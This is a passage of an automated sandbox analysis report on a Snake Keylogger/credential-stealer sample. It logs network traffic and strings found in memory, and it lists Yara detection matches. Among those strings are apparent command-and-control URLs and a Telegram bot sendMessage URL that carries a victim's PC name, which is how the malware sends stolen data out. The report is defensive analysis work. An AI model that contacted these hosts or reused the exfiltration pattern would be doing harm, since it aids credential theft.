                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49755 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49764 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49773 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/173.254.250.79 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: mail.rasextraders.com
                Source: zDAKFK.exe, 00000010.00000002.4132563697.0000000002A05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002BC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002BC8000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.000000000295A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.rasextraders.com
                Source: zDAKFK.exe, 00000010.00000002.4143927396.00000000060C0000.00000004.00000020.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r11.i.lencr.org/0/
                Source: zDAKFK.exe, 00000010.00000002.4143927396.00000000060C0000.00000004.00000020.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r11.o.lencr.org0#
                Source: zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rasextraders.com
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1725042592.0000000003532000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1767372699.0000000002752000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Amcache.hve.19.drString found in binary or memory: http://upx.sf.net
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1989822637.0000000002B01000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002881000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731386438.000000000633C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.comR:
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1731444907.0000000007412000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: zDAKFK.exe, 00000010.00000002.4143927396.00000000060C0000.00000004.00000020.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: zDAKFK.exe, 00000010.00000002.4143927396.00000000060C0000.00000004.00000020.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002A15000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:226546%0D%0ADate%20a
                Source: zDAKFK.exe, 00000010.00000002.4132563697.0000000002A47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: zDAKFK.exe, 00000010.00000002.4132563697.0000000002A42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: zDAKFK.exe, 00000010.00000002.4132563697.00000000028CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 00000000.00000002.1727563021.0000000004E90000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe, 0000000B.00000002.1988112814.0000000000402000.00000040.00000400.00020000.00000000.sdmp, zDAKFK.exe, 0000000C.00000002.1769470326.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.00000000028CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: zDAKFK.exe, 00000010.00000002.4132563697.00000000028CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.79
                Source: zDAKFK.exe, 00000010.00000002.4132563697.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.79$
                Source: zDAKFK.exe, 00000010.00000002.4132563697.00000000028FC000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.000000000295A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.794
                Source: zDAKFK.exe, 00000010.00000002.4136156770.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.00000000039D2000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003C24000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.000000000395D000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: zDAKFK.exe, 00000010.00000002.4136156770.00000000039AD000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B07000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003938000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003963000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: zDAKFK.exe, 00000010.00000002.4136156770.00000000039AB000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.00000000039D2000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003C24000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B4F000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.000000000395D000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: zDAKFK.exe, 00000010.00000002.4136156770.00000000039AD000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003B07000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003C00000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003ADC000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003938000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4136156770.0000000003963000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: zDAKFK.exe, 00000010.00000002.4132563697.0000000002A78000.00000004.00000800.00020000.00000000.sdmp, zDAKFK.exe, 00000010.00000002.4132563697.0000000002980000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: zDAKFK.exe, 00000010.00000002.4132563697.0000000002A73000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 12.2.zDAKFK.exe.40b12a8.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 11.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4e904d8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.3030.23832.exe.4ed36f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 12.2.zDAKFK.exe.40f44c8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
